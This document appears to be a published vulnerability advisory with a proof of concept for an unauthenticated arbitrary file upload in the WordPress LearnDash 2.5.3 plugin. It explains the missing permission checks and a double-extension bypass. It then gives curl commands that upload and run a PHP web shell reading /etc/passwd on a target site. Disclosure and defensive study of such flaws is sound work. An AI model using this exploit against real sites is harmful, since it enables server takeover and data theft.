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WordPress LearnDash 2.5.3 File Upload

🗓️ 08 Jan 2018 00:00:00Reported by NinTechNetType 
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WordPress LearnDash 2.5.3 Unauthenticated Arbitrary File Uploa

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`# Exploit Title: WordPress LearnDash 2.5.3 Unauthenticated Arbitrary File Upload  
# Date: 07-01-2018  
# Vendor Homepage: https://www.learndash.com/  
# Vendor Changelog: https://www.learndash.com/changelog/  
# Version: 2.5.3  
# Exploit Author: NinTechNet  
# Author Advisory: http://nin.link/learndash/  
# Category: Webapps  
  
1. Overview:  
  
This vulnerability has been exploited at least since Dec. 27th, 2017.   
Here's a log sample showing the attack:  
87.244.138.44 - - [27/Dec/2017:20:29:33 +0100] "POST / HTTP/1.0" 200   
47095  
87.244.138.44 - - [27/Dec/2017:20:29:34 +0100] "GET   
/wp-content/uploads/assignments/assig.php. HTTP/1.1" 200 266  
87.244.138.44 - - [27/Dec/2017:20:29:36 +0100] "GET   
/wp-admin/ms-site.php HTTP/1.1" 200 4110  
  
2. Description:  
  
The plugin offers the possibility to create courses and to assign   
lessons to them. Each lesson can allow uploads, and it is possible to   
restrict them by file extensions. Uploads are handled by the   
learndash_assignment_process_init() function located in the   
"wp-content/plugins/sfwd-lms/includes/ld-assignment-uploads.php" script:  
  
// ===================================================================  
function learndash_assignment_process_init() {  
  
if ( isset( $_POST['uploadfile'] ) && isset( $_POST['post'] ) ) {  
$post_id = $_POST['post'];  
$file = $_FILES['uploadfiles'];  
  
if (( ! empty( $file['name'][0] ) ) && ( learndash_check_upload(   
$file, $post_id ) ) ) {  
$file_desc = learndash_fileupload_process( $file, $post_id );  
$file_name = $file_desc['filename'];  
$file_link = $file_desc['filelink'];  
$params = array(  
'filelink' => $file_link,  
'filename' => $file_name,  
);  
}  
}  
}  
// ===================================================================  
  
Neither this function nor the learndash_check_upload() and   
learndash_fileupload_process() functions it calls check if the user is   
authenticated or allowed to upload files, or even if the post ID, course   
and lesson exist before accepting the file.  
  
The plugin calls the WordPress wp_check_filetype() API function, removes   
the filename extension and appends the one returned by this function.   
Because wp_check_filetype() will return an empty value for PHP scripts,   
the file extension will be removed: "script.php" will become "script.".   
But that can be bypassed by appending a double extension, e.g.,   
"script.php.php" which will be turned into "script.php.". Although the   
PHP filename ends with a [.] dot, it is still executed by default by the   
PHP interpreter on servers running Apache with PHP CGI/FastCGI SAPI.  
  
3. Proof of concept:  
  
To exploit the vulnerability, it is only required that the plugin be   
enabled, even if no courses or lessons were created (bogus values can be   
assigned to each variable):  
  
$ echo '<?php echo exec("ls -la /etc/passwd");' > shell.php.php  
$ curl -F "post=foobar" -F "course_id=foobar" -F "uploadfile=foobar" -F   
"uploadfiles[]=@./shell.php.php" http://victim.tld/  
$ curl 'http://victim.tld/wp-content/uploads/assignments/shell.php.'  
-rw-r--r-- 1 root root 2385 Apr 14 2017 /etc/passwd  
  
4. Timeline:  
  
Authors were informed on January 2nd and released version 2.5.4 on January 3rd.  
  
  
`

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